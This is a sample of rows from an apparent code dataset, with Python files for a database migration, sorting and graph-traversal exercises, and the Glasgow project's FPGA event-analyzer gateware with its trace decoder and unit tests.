Dataset schema (column name, dtype, observed lengths / distinct values):

| column | dtype | lengths / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3–281 |
| content_id | string | length 40 |
| detected_licenses | list | length 0–57 |
| license_type | string | 2 classes |
| repo_name | string | length 6–116 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 313 classes |
| visit_date | timestamp[us] |  |
| revision_date | timestamp[us] |  |
| committer_date | timestamp[us] |  |
| github_id | int64 | 18.2k–668M, nullable (⌀) |
| star_events_count | int64 | 0–102k |
| fork_events_count | int64 | 0–38.2k |
| gha_license_id | string | 17 classes |
| gha_event_created_at | timestamp[us] |  |
| gha_created_at | timestamp[us] |  |
| gha_language | string | 107 classes |
| src_encoding | string | 20 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 4–6.02M |
| extension | string | 78 classes |
| content | string | length 2–6.02M |
| authors | list | length 1 |
| author | string | length 0–175 |

The sample rows below list these fields in this order, with values separated by `|` and the file content and author list shown inline.
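As a quick orientation aid, here is a minimal sketch of how rows with this schema might be streamed and filtered; it assumes the split is published through the Hugging Face `datasets` library, and the dataset id `org/python-code-dump` together with the filter thresholds are placeholders for illustration, not properties of this dump.

# Minimal sketch; "org/python-code-dump" is a placeholder dataset id, not the real source.
from datasets import load_dataset

rows = load_dataset("org/python-code-dump", split="train", streaming=True)
for row in rows:
    # Keep small, permissively licensed, non-generated Python files.
    if (row["license_type"] == "permissive"
            and not row["is_generated"]
            and row["length_bytes"] < 10_000):
        print(row["repo_name"], row["path"], row["length_bytes"])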
561c07f563101185de123baff76553af01f9f150
|
d1e2f5993573a16ed6cf359215e596814db33ad7
|
/flaskm/db_respository/versions/003_migration.py
|
c26e106263a75f6e4f7112810b5f90ddb811e57f
|
[] |
no_license
|
Andor-Z/My-Learning-Note
|
a6b62fd10119cede9ba4c6c79b2dcb5c346d11e0
|
202401f1be1f9f7c32049623315c0c54720498f7
|
refs/heads/master
| 2022-10-22T13:55:44.821097 | 2016-07-10T09:21:02 | 2016-07-10T09:21:02 | 42,592,078 | 1 | 1 | null | 2022-10-20T21:49:08 | 2015-09-16T14:24:01 |
Python
|
UTF-8
|
Python
| false | false | 1,610 |
py
|
from sqlalchemy import *
from migrate import *
from migrate.changeset import schema
pre_meta = MetaData()
post_meta = MetaData()
alembic_version = Table('alembic_version', pre_meta,
Column('version_num', VARCHAR(length=32), nullable=False),
)
users = Table('users', post_meta,
Column('id', Integer, primary_key=True, nullable=False),
Column('name', String(length=64)),
Column('location', String(length=64)),
Column('about_me', Text),
Column('member_since', DateTime, default=ColumnDefault(<function ColumnDefault._maybe_wrap_callable.<locals>.<lambda> at 0x000000000347CAE8>)),
Column('last_seen', DateTime, default=ColumnDefault(<function ColumnDefault._maybe_wrap_callable.<locals>.<lambda> at 0x0000000004CDF268>)),
Column('email', String(length=64)),
Column('username', String(length=64)),
Column('role_id', Integer),
Column('password_hash', String(length=128)),
Column('confirmed', Boolean, default=ColumnDefault(False)),
Column('avatar_hash', String(length=32)),
)
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
pre_meta.bind = migrate_engine
post_meta.bind = migrate_engine
pre_meta.tables['alembic_version'].drop()
post_meta.tables['users'].columns['avatar_hash'].create()
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
pre_meta.bind = migrate_engine
post_meta.bind = migrate_engine
pre_meta.tables['alembic_version'].create()
post_meta.tables['users'].columns['avatar_hash'].drop()
|
[
"[email protected]"
] | |
61ca45d83eb6073d7855e1253f88d235326f2005
|
db7601406ea38e0b361d9a1c54ba640ae9b132eb
|
/quicksort.py
|
0463437079b854f611c9d76d6e9146e84805bc56
|
[] |
no_license
|
FalseF/Algorithms-and-Problem-Solving-with-Python
|
c06c049d7499df76795eac8b82d8f5aebe126109
|
d53ee80da5ff865eef05bbe280bdc68dae4f275d
|
refs/heads/master
| 2023-07-17T06:24:47.918286 | 2021-09-06T16:32:30 | 2021-09-06T16:32:30 | 403,690,848 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 518 |
py
|
cnt=0
def partition(A,low,high):
global cnt
pivot=A[high]
i=low-1
for j in range(low,high):
if(pivot>=A[j]):
i+=1
A[i],A[j]=A[j],A[i]
cnt+=1
A[i+1],A[high]=A[high],A[i+1]
cnt+=1
return i+1
def quick_sort(A,low,high):
if(low<high):
pivot=partition(A,low,high)
quick_sort(A,low,pivot-1)
quick_sort(A,pivot+1,high)
A=[10,5,4,1,8]
quick_sort(A,0,len(A)-1)
print(A)
print("Swapping time")
print(cnt)
|
[
"[email protected]"
] | |
d4fd9849fa05350b943d25108223405f5d1ff1e1
|
24946a607d5f6425f07d6def4968659c627e5324
|
/Python/any-or-all.py
|
4fbe2d7a06841045541ba086ab6a9fd5e9056ae0
|
[] |
no_license
|
mmrubayet/HackerRank_solutions
|
5d8acbb8fd6f305a006f147e6cb76dbfc71bbca5
|
f1c72fbf730b6a79656d578f6c40a128a6f0ac5c
|
refs/heads/master
| 2023-06-02T16:51:18.017902 | 2021-06-19T18:35:41 | 2021-06-19T18:35:41 | 233,853,287 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 109 |
py
|
n, ar = int(input()), input().split()
print(all([int(i)>0 for i in ar]) and any([j == j[::-1] for j in ar]))
|
[
"[email protected]"
] | |
b369d7adcb7c77b520a6603260a100ec030d48d3
|
57e778bf76e8857aeae96a997c9aa36d0744078b
|
/dfs/dfs_order.py
|
47237ae0ad98285b6bdaefa8da0906b8627a1eed
|
[] |
no_license
|
hieuza/algorithms
|
1f9da2a2f8bdc054fa2b9028da2ac3ad90eed29b
|
beac146b44551bda1a227aff0f2dda4dd1e555bb
|
refs/heads/master
| 2021-01-18T16:32:19.823463 | 2013-08-05T03:43:04 | 2013-08-05T03:43:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,598 |
py
|
#!/usr/bin/env python
# [email protected]
# 03.Dec.2012
# updated: 03.Aug.2013, iterative DFS
# depth-first-search ordering
# preorder, postorder and reversed postorder
from graph import Graph
import time
class DFSOrder(object):
def __init__(self, g, recursive=True):
self.g = g
self.recursive = recursive
# queues of visited vertices
self.preorder = []
self.postorder = []
visited = [False] * g.N
for u in xrange(self.g.N):
if not visited[u]:
if self.recursive:
self.dfs(u, visited)
else:
self.iterative_dfs(u, visited)
# stack of post visited vertices
self.reversed_postorder = self.postorder[:]
self.reversed_postorder.reverse()
def dfs(self, u, visited):
visited[u] = True
self.preorder.append(u)
for v in self.g.adjacency(u):
if not visited[v]:
self.dfs(v, visited)
self.postorder.append(u)
# dfs started from vertex u
def iterative_dfs(self, u, visited):
stack = [u]
visited[u] = True
self.preorder.append(u)
bNextStackElem = False
while len(stack) > 0: # stack is not empty
s = stack[-1] # peek the top of the stack
bNextStackElem = False
for v in self.g.adjacency(s):
if bNextStackElem:
break
if not visited[v]:
stack.append(v) # push to the top of stack
visited[v] = True
self.preorder.append(v)
# first time visit the node
# will process it in next while iterator
bNextStackElem = True
continue
if not bNextStackElem:
self.postorder.append(s)
stack.pop()
from graph import simple_graph
def test(n):
g = Graph(n, weighted=False, directed=True)
g.random_generate(max_degree=20)
# print g
# g = simple_graph()
p = []
for r in [True, False]:
try:
t0 = time.time()
dfsorder = DFSOrder(g, recursive=r)
except RuntimeError as e:
print 'RuntimeError:', e
continue
finally:
print 'running time:', ('%.5f' % (time.time() - t0))
if n < 20:
print ' preorder:', dfsorder.preorder
print ' postorder:', dfsorder.postorder
print 'rev-postorder:', dfsorder.reversed_postorder
p.append([dfsorder.preorder, dfsorder.postorder,\
dfsorder.reversed_postorder])
if len(p) == 1: # only iterative result
print 'Iterative running completed'
else:
# check if iterative and recursive results are the same
pre1, post1, rev1 = p[0]
pre2, post2, rev2 = p[1]
if (pre1 != pre2 or post1 != post2 or rev1 != rev2):
print "wrong iterative algorithm"
else:
print "OK for this test"
if __name__ == '__main__':
import sys
n = 5
if len(sys.argv) > 1:
n = int(sys.argv[1])
test(n)
|
[
"[email protected]"
] | |
b252813ec3a656ad05163967f29a6b1d6d3f5201
|
058a77c2a321671a183160fdc0ecfe46889d59ac
|
/Day17/merge_sort.py
|
27a121d677169440053453a5af60a2fc128e149b
|
[] |
no_license
|
MinJae-Gwon/Algo
|
502b919ca5a8bb8392cd284008f42693df7a01bb
|
23913f8e7495c931e59ea95b4bfa686818ede8e0
|
refs/heads/master
| 2021-07-17T05:55:16.243320 | 2020-06-27T13:11:49 | 2020-06-27T13:11:49 | 171,435,252 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 597 |
py
|
data = [38, 27, 43, 3, 9, 82, 10]
def merge(l, r):
result = []
while True:
if l[0] <= r[0]:
result.append(l.pop(0))
else:
result.append(r.pop(0))
if len(l) == 0 or len(r) == 0:
break
if len(l) > 0:
result.extend(l)
if len(r) > 0:
result.extend(r)
return result
def merge_sort(m):
if len(m) <= 1:
return m
mid = len(m) // 2
left = m[:mid]
right = m[mid:]
left = merge_sort(left)
right = merge_sort(right)
return merge(left, right)
print(merge_sort(data))
|
[
"[email protected]"
] | |
5918ac3617d6a5c640a6e0aca7193152daaf268f
|
b0a217700c563c4f057f2aebbde8faba4b1b26d2
|
/software/glasgow/gateware/analyzer.py
|
bb4a69bc6366646bbb3c9b40d54291e9a389cd88
|
[
"0BSD",
"Apache-2.0"
] |
permissive
|
kbeckmann/Glasgow
|
5d183865da4fb499099d4c17e878a76192b691e7
|
cd31e293cb99ee10a3e4a03ff26f6f124e512c64
|
refs/heads/master
| 2021-09-15T15:59:38.211633 | 2018-11-15T22:36:04 | 2018-11-22T21:13:59 | 157,077,707 | 3 | 0 |
NOASSERTION
| 2018-11-11T12:33:49 | 2018-11-11T12:33:48 | null |
UTF-8
|
Python
| false | false | 29,898 |
py
|
from functools import reduce
from collections import OrderedDict
from migen import *
from migen.fhdl.bitcontainer import log2_int
from migen.genlib.fifo import _FIFOInterface, SyncFIFOBuffered
from migen.genlib.coding import PriorityEncoder, PriorityDecoder
from migen.genlib.fsm import FSM
__all__ = ["EventSource", "EventAnalyzer", "TraceDecodingError", "TraceDecoder"]
REPORT_DELAY = 0b10000000
REPORT_DELAY_MASK = 0b10000000
REPORT_EVENT = 0b01000000
REPORT_EVENT_MASK = 0b11000000
REPORT_SPECIAL = 0b00000000
REPORT_SPECIAL_MASK = 0b11000000
SPECIAL_DONE = 0b000000
SPECIAL_OVERRUN = 0b000001
SPECIAL_THROTTLE = 0b000010
SPECIAL_DETHROTTLE = 0b000011
class EventSource(Module):
def __init__(self, name, kind, width, fields, depth):
assert (width > 0 and kind in ("change", "strobe") or
width == 0 and kind == "strobe")
self.name = name
self.width = width
self.fields = fields
self.depth = depth
self.kind = kind
self.data = Signal(max(1, width))
self.trigger = Signal()
class EventAnalyzer(Module):
"""
An event analyzer module.
This event analyzer is designed to observe parallel, bursty processes in real-time, and yet
degrade gracefully (i.e. without losing data or breaking most applets) when observing processes
that generate events continuously, or generate very many simultaneous events for a short time.
To do this, the event analyzer is permitted to pause any applets marked as purely synchronous
once the event FIFO high-water mark is reached.
The event analyzer tries to make efficient use of power-of-2 wide block RAMs and be highly
tunable. To achieve this, it separates the event FIFO from the event data FIFOs, and does not
store timestamps explicitly. In a system with `n` events, each of which carries `d_n` bits
of data, there would be a single event FIFO that is `n` bits wide, where a bit being set means
that event `n` occurred at a given cycle; `n` event data FIFOs that are `d_n` bits wide each,
where, if a bit is set in the event FIFO, a data word is pushed into the event data FIFO; and
finally, one delay FIFO, where the last entry is incremented on every cycle that has
no event, and a new entry is pushed on every cycle there is at least one event. This way,
only cycles that have at least one event add new FIFO entries, and only one wide timestamp
counter needs to be maintained, greatly reducing the amount of necessary resources compared
to a more naive approach.
"""
@staticmethod
def _depth_for_width(width):
if width == 0:
return 0
elif width <= 2:
return 2048
elif width <= 4:
return 1024
elif width <= 8:
return 512
else:
return 256
def __init__(self, output_fifo, event_depth=None, delay_width=16):
assert output_fifo.width == 8
self.output_fifo = output_fifo
self.delay_width = delay_width
self.event_depth = event_depth
self.event_sources = Array()
self.done = Signal()
self.throttle = Signal()
self.overrun = Signal()
def add_event_source(self, name, kind, width, fields=(), depth=None):
if depth is None:
depth = self._depth_for_width(width)
event_source = EventSource(name, kind, width, fields, depth)
self.event_sources.append(event_source)
return event_source
def do_finalize(self):
assert len(self.event_sources) < 2 ** 6
assert max(s.width for s in self.event_sources) <= 32
# Fill the event, event data, and delay FIFOs.
throttle_on = Signal()
throttle_off = Signal()
throttle_edge = Signal()
throttle_fifos = []
self.sync += [
If(~self.throttle & throttle_on,
self.throttle.eq(1),
throttle_edge.eq(1)
).Elif(self.throttle & throttle_off,
self.throttle.eq(0),
throttle_edge.eq(1)
).Else(
throttle_edge.eq(0)
)
]
overrun_trip = Signal()
overrun_fifos = []
self.sync += [
If(overrun_trip,
self.overrun.eq(1)
)
]
event_width = 1 + len(self.event_sources)
if self.event_depth is None:
event_depth = min(self._depth_for_width(event_width),
self._depth_for_width(self.delay_width))
else:
event_depth = self.event_depth
self.submodules.event_fifo = event_fifo = \
SyncFIFOBuffered(width=event_width, depth=event_depth)
throttle_fifos.append(self.event_fifo)
self.comb += [
event_fifo.din.eq(Cat(self.throttle, [s.trigger for s in self.event_sources])),
event_fifo.we.eq(reduce(lambda a, b: a | b, (s.trigger for s in self.event_sources)) |
throttle_edge)
]
self.submodules.delay_fifo = delay_fifo = \
SyncFIFOBuffered(width=self.delay_width, depth=event_depth)
delay_timer = self._delay_timer = Signal(self.delay_width)
delay_ovrun = ((1 << self.delay_width) - 1)
delay_max = delay_ovrun - 1
self.sync += [
If(delay_fifo.we,
delay_timer.eq(0)
).Else(
delay_timer.eq(delay_timer + 1)
)
]
self.comb += [
delay_fifo.din.eq(Mux(self.overrun, delay_ovrun, delay_timer)),
delay_fifo.we.eq(event_fifo.we | (delay_timer == delay_max) |
self.done | self.overrun),
]
for event_source in self.event_sources:
if event_source.width > 0:
event_source.submodules.data_fifo = event_data_fifo = \
SyncFIFOBuffered(event_source.width, event_source.depth)
self.submodules += event_source
throttle_fifos.append(event_data_fifo)
self.comb += [
event_data_fifo.din.eq(event_source.data),
event_data_fifo.we.eq(event_source.trigger),
]
else:
event_source.submodules.data_fifo = _FIFOInterface(1, 0)
# Throttle applets based on FIFO levels with hysteresis.
self.comb += [
throttle_on .eq(reduce(lambda a, b: a | b,
(f.fifo.level >= f.depth - f.depth // (4 if f.depth > 4 else 2)
for f in throttle_fifos))),
throttle_off.eq(reduce(lambda a, b: a & b,
(f.fifo.level < f.depth // (4 if f.depth > 4 else 2)
for f in throttle_fifos))),
]
# Detect imminent FIFO overrun and trip overrun indication.
self.comb += [
overrun_trip.eq(reduce(lambda a, b: a | b,
(f.fifo.level == f.depth - 2
for f in throttle_fifos)))
]
# Dequeue events, and serialize events and event data.
self.submodules.event_encoder = event_encoder = \
PriorityEncoder(width=len(self.event_sources))
self.submodules.event_decoder = event_decoder = \
PriorityDecoder(width=len(self.event_sources))
self.comb += event_decoder.i.eq(event_encoder.o)
self.submodules.serializer = serializer = FSM(reset_state="WAIT-EVENT")
rep_overrun = Signal()
rep_throttle_new = Signal()
rep_throttle_cur = Signal()
delay_septets = 5
delay_counter = Signal(7 * delay_septets)
serializer.act("WAIT-EVENT",
If(delay_fifo.readable,
delay_fifo.re.eq(1),
NextValue(delay_counter, delay_counter + delay_fifo.dout + 1),
If(delay_fifo.dout == delay_ovrun,
NextValue(rep_overrun, 1),
NextState("REPORT-DELAY")
)
),
If(event_fifo.readable,
event_fifo.re.eq(1),
NextValue(event_encoder.i, event_fifo.dout[1:]),
NextValue(rep_throttle_new, event_fifo.dout[0]),
If((event_fifo.dout != 0) | (rep_throttle_cur != event_fifo.dout[0]),
NextState("REPORT-DELAY")
)
).Elif(self.done,
NextState("REPORT-DELAY")
)
)
serializer.act("REPORT-DELAY",
If(delay_counter >= 128 ** 4,
NextState("REPORT-DELAY-5")
).Elif(delay_counter >= 128 ** 3,
NextState("REPORT-DELAY-4")
).Elif(delay_counter >= 128 ** 2,
NextState("REPORT-DELAY-3")
).Elif(delay_counter >= 128 ** 1,
NextState("REPORT-DELAY-2")
).Else(
NextState("REPORT-DELAY-1")
)
)
for septet_no in range(delay_septets, 0, -1):
if septet_no == 1:
next_state = [
NextValue(delay_counter, 0),
If(rep_overrun,
NextState("REPORT-OVERRUN")
).Elif(rep_throttle_cur != rep_throttle_new,
NextState("REPORT-THROTTLE")
).Elif(event_encoder.i,
NextState("REPORT-EVENT")
).Elif(self.done,
NextState("REPORT-DONE")
).Else(
NextState("WAIT-EVENT")
)
]
else:
next_state = [
NextState("REPORT-DELAY-%d" % (septet_no - 1))
]
serializer.act("REPORT-DELAY-%d" % septet_no,
If(self.output_fifo.writable,
self.output_fifo.din.eq(
REPORT_DELAY | delay_counter.part((septet_no - 1) * 7, 7)),
self.output_fifo.we.eq(1),
*next_state
)
)
serializer.act("REPORT-THROTTLE",
If(self.output_fifo.writable,
NextValue(rep_throttle_cur, rep_throttle_new),
If(rep_throttle_new,
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_THROTTLE),
).Else(
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_DETHROTTLE),
),
self.output_fifo.we.eq(1),
If(event_encoder.n,
NextState("WAIT-EVENT")
).Else(
NextState("REPORT-EVENT")
)
)
)
event_source = self.event_sources[event_encoder.o]
event_data = Signal(32)
serializer.act("REPORT-EVENT",
If(self.output_fifo.writable,
NextValue(event_encoder.i, event_encoder.i & ~event_decoder.o),
self.output_fifo.din.eq(
REPORT_EVENT | event_encoder.o),
self.output_fifo.we.eq(1),
NextValue(event_data, event_source.data_fifo.dout),
event_source.data_fifo.re.eq(1),
If(event_source.width > 24,
NextState("REPORT-EVENT-DATA-4")
).Elif(event_source.width > 16,
NextState("REPORT-EVENT-DATA-3")
).Elif(event_source.width > 8,
NextState("REPORT-EVENT-DATA-2")
).Elif(event_source.width > 0,
NextState("REPORT-EVENT-DATA-1")
).Else(
If(event_encoder.i & ~event_decoder.o,
NextState("REPORT-EVENT")
).Else(
NextState("WAIT-EVENT")
)
)
)
)
for octet_no in range(4, 0, -1):
if octet_no == 1:
next_state = [
If(event_encoder.n,
NextState("WAIT-EVENT")
).Else(
NextState("REPORT-EVENT")
)
]
else:
next_state = [
NextState("REPORT-EVENT-DATA-%d" % (octet_no - 1))
]
serializer.act("REPORT-EVENT-DATA-%d" % octet_no,
If(self.output_fifo.writable,
self.output_fifo.din.eq(event_data.part((octet_no - 1) * 8, 8)),
self.output_fifo.we.eq(1),
*next_state
)
)
serializer.act("REPORT-DONE",
If(self.output_fifo.writable,
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_DONE),
self.output_fifo.we.eq(1),
NextState("DONE")
)
)
serializer.act("DONE",
If(~self.done,
NextState("WAIT-EVENT")
)
)
serializer.act("REPORT-OVERRUN",
If(self.output_fifo.writable,
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_OVERRUN),
self.output_fifo.we.eq(1),
NextState("OVERRUN")
)
)
serializer.act("OVERRUN",
NextState("OVERRUN")
)
class TraceDecodingError(Exception):
pass
class TraceDecoder:
"""
Event analyzer trace decoder.
Decodes raw analyzer traces into a timestamped sequence of maps from event fields to
their values.
"""
def __init__(self, event_sources, absolute_timestamps=True):
self.event_sources = event_sources
self.absolute_timestamps = absolute_timestamps
self._state = "IDLE"
self._byte_off = 0
self._timestamp = 0
self._delay = 0
self._event_src = 0
self._event_off = 0
self._event_data = 0
self._pending = OrderedDict()
self._timeline = []
def events(self):
"""
Return names and widths for all events that may be emitted by this trace decoder.
"""
yield ("throttle", "throttle", 1)
for event_src in self.event_sources:
if event_src.fields:
for field_name, field_width in event_src.fields:
yield ("%s-%s" % (field_name, event_src.name), event_src.kind, field_width)
else:
yield (event_src.name, event_src.kind, event_src.width)
def _flush_timestamp(self):
if self._delay == 0:
return
if self._pending:
self._timeline.append((self._timestamp, self._pending))
self._pending = OrderedDict()
if self.absolute_timestamps:
self._timestamp += self._delay
else:
self._timestamp = self._delay
self._delay = 0
def process(self, data):
"""
Incrementally parse a chunk of analyzer trace, and record events in it.
"""
for octet in data:
is_delay = ((octet & REPORT_DELAY_MASK) == REPORT_DELAY)
is_event = ((octet & REPORT_EVENT_MASK) == REPORT_EVENT)
is_special = ((octet & REPORT_SPECIAL_MASK) == REPORT_SPECIAL)
special = octet & ~REPORT_SPECIAL
if self._state == "IDLE" and is_delay:
self._state = "DELAY"
self._delay = octet & ~REPORT_DELAY_MASK
elif self._state == "DELAY" and is_delay:
self._delay = (self._delay << 7) | (octet & ~REPORT_DELAY_MASK)
elif self._state == "DELAY" and is_special and \
special in (SPECIAL_THROTTLE, SPECIAL_DETHROTTLE):
self._flush_timestamp()
if special == SPECIAL_THROTTLE:
self._pending["throttle"] = 1
elif special == SPECIAL_DETHROTTLE:
self._pending["throttle"] = 0
elif self._state in ("IDLE", "DELAY") and is_event:
self._flush_timestamp()
if (octet & ~REPORT_EVENT_MASK) > len(self.event_sources):
raise TraceDecodingError("at byte offset %d: event source out of bounds" %
self._byte_off)
self._event_src = self.event_sources[octet & ~REPORT_EVENT_MASK]
if self._event_src.width == 0:
self._pending[self._event_src.name] = None
self._state = "IDLE"
else:
self._event_off = self._event_src.width
self._event_data = 0
self._state = "EVENT"
elif self._state == "EVENT":
self._event_data <<= 8
self._event_data |= octet
if self._event_off > 8:
self._event_off -= 8
else:
if self._event_src.fields:
offset = 0
for field_name, field_width in self._event_src.fields:
self._pending["%s-%s" % (field_name, self._event_src.name)] = \
(self._event_data >> offset) & ((1 << field_width) - 1)
offset += field_width
else:
self._pending[self._event_src.name] = self._event_data
self._state = "IDLE"
elif self._state in "DELAY" and is_special and \
special in (SPECIAL_DONE, SPECIAL_OVERRUN):
self._flush_timestamp()
if special == SPECIAL_DONE:
self._state = "DONE"
elif special == SPECIAL_OVERRUN:
self._state = "OVERRUN"
else:
raise TraceDecodingError("at byte offset %d: invalid byte %#04x for state %s" %
(self._byte_off, octet, self._state))
self._byte_off += 1
def flush(self, pending=False):
"""
Return the complete event timeline since the start of decoding or the previous flush.
If ``pending`` is ``True``, also flushes pending events; this may cause duplicate
timestamps if more events arrive after the flush.
"""
if self._state == "OVERRUN":
self._timeline.append((self._timestamp, "overrun"))
elif pending and self._pending or self._state == "DONE":
self._timeline.append((self._timestamp, self._pending))
self._pending = OrderedDict()
timeline, self._timeline = self._timeline, []
return timeline
def is_done(self):
return self._state in ("DONE", "OVERRUN")
# -------------------------------------------------------------------------------------------------
import unittest
from migen.fhdl import verilog
from . import simulation_test
class EventAnalyzerTestbench(Module):
def __init__(self, **kwargs):
self.submodules.fifo = SyncFIFOBuffered(width=8, depth=64)
self.submodules.dut = EventAnalyzer(self.fifo, **kwargs)
def trigger(self, index, data):
yield self.dut.event_sources[index].trigger.eq(1)
yield self.dut.event_sources[index].data.eq(data)
def step(self):
yield
for event_source in self.dut.event_sources:
yield event_source.trigger.eq(0)
def read(self, count, limit=128):
data = []
cycle = 0
while len(data) < count:
while not (yield self.fifo.readable) and cycle < limit:
yield
cycle += 1
if not (yield self.fifo.readable):
raise ValueError("FIFO underflow")
data.append((yield from self.fifo.read()))
cycle = 16
while not (yield self.fifo.readable) and cycle < limit:
yield
cycle += 1
if (yield self.fifo.readable):
raise ValueError("junk in FIFO: %#04x at %d" % ((yield self.fifo.dout), count))
return data
class EventAnalyzerTestCase(unittest.TestCase):
def setUp(self):
self.tb = EventAnalyzerTestbench(event_depth=16)
def configure(self, tb, sources):
for n, args in enumerate(sources):
if not isinstance(args, tuple):
args = (args,)
tb.dut.add_event_source(str(n), "strobe", *args)
def assertEmitted(self, tb, data, decoded, flush_pending=True):
self.assertEqual((yield from tb.read(len(data))), data)
decoder = TraceDecoder(self.tb.dut.event_sources)
decoder.process(data)
self.assertEqual(decoder.flush(flush_pending), decoded)
@simulation_test(sources=(8,))
def test_one_8bit_src(self, tb):
yield from tb.trigger(0, 0xaa)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xaa,
], [
(2, {"0": 0xaa}),
])
@simulation_test(sources=(8,8))
def test_two_8bit_src(self, tb):
yield from tb.trigger(0, 0xaa)
yield from tb.trigger(1, 0xbb)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xaa,
REPORT_EVENT|1, 0xbb,
], [
(2, {"0": 0xaa, "1": 0xbb}),
])
@simulation_test(sources=(12,))
def test_one_12bit_src(self, tb):
yield from tb.trigger(0, 0xabc)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0x0a, 0xbc,
], [
(2, {"0": 0xabc}),
])
@simulation_test(sources=(16,))
def test_one_16bit_src(self, tb):
yield from tb.trigger(0, 0xabcd)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xab, 0xcd,
], [
(2, {"0": 0xabcd}),
])
@simulation_test(sources=(24,))
def test_one_24bit_src(self, tb):
yield from tb.trigger(0, 0xabcdef)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xab, 0xcd, 0xef
], [
(2, {"0": 0xabcdef}),
])
@simulation_test(sources=(32,))
def test_one_32bit_src(self, tb):
yield from tb.trigger(0, 0xabcdef12)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xab, 0xcd, 0xef, 0x12
], [
(2, {"0": 0xabcdef12}),
])
@simulation_test(sources=(0,))
def test_one_0bit_src(self, tb):
yield from tb.trigger(0, 0)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0,
], [
(2, {"0": None}),
])
@simulation_test(sources=(0,0))
def test_two_0bit_src(self, tb):
yield from tb.trigger(0, 0)
yield from tb.trigger(1, 0)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0,
REPORT_EVENT|1,
], [
(2, {"0": None, "1": None}),
])
@simulation_test(sources=(0,1))
def test_0bit_1bit_src(self, tb):
yield from tb.trigger(0, 0)
yield from tb.trigger(1, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0,
REPORT_EVENT|1, 0b1
], [
(2, {"0": None, "1": 0b1}),
])
@simulation_test(sources=(1,0))
def test_1bit_0bit_src(self, tb):
yield from tb.trigger(0, 1)
yield from tb.trigger(1, 0)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0b1,
REPORT_EVENT|1,
], [
(2, {"0": 0b1, "1": None}),
])
@simulation_test(sources=((3, (("a", 1), ("b", 2))),))
def test_fields(self, tb):
yield from tb.trigger(0, 0b101)
yield from tb.step()
yield from tb.trigger(0, 0b110)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0b101,
REPORT_DELAY|1,
REPORT_EVENT|0, 0b110,
], [
(2, {"a-0": 0b1, "b-0": 0b10}),
(3, {"a-0": 0b0, "b-0": 0b11}),
])
@simulation_test(sources=(8,))
def test_delay(self, tb):
yield
yield
yield from tb.trigger(0, 0xaa)
yield from tb.step()
yield
yield from tb.trigger(0, 0xbb)
yield from tb.step()
yield
yield
yield from self.assertEmitted(tb, [
REPORT_DELAY|4,
REPORT_EVENT|0, 0xaa,
REPORT_DELAY|2,
REPORT_EVENT|0, 0xbb,
], [
(4, {"0": 0xaa}),
(6, {"0": 0xbb}),
])
@simulation_test(sources=(1,))
def test_delay_2_septet(self, tb):
yield tb.dut._delay_timer.eq(0b1_1110000)
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000001,
REPORT_DELAY|0b1110001,
REPORT_EVENT|0, 0b1
], [
(0b1_1110001, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_3_septet(self, tb):
yield tb.dut._delay_timer.eq(0b01_0011000_1100011)
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000001,
REPORT_DELAY|0b0011000,
REPORT_DELAY|0b1100100,
REPORT_EVENT|0, 0b1
], [
(0b01_0011000_1100100, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_max(self, tb):
yield tb.dut._delay_timer.eq(0xfffe)
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000011,
REPORT_DELAY|0b1111111,
REPORT_DELAY|0b1111111,
REPORT_EVENT|0, 0b1
], [
(0xffff, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_overflow(self, tb):
yield tb.dut._delay_timer.eq(0xfffe)
yield
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000100,
REPORT_DELAY|0b0000000,
REPORT_DELAY|0b0000000,
REPORT_EVENT|0, 0b1
], [
(0x10000, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_overflow_p1(self, tb):
yield tb.dut._delay_timer.eq(0xfffe)
yield
yield
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000100,
REPORT_DELAY|0b0000000,
REPORT_DELAY|0b0000001,
REPORT_EVENT|0, 0b1
], [
(0x10001, {"0": 0b1}),
])
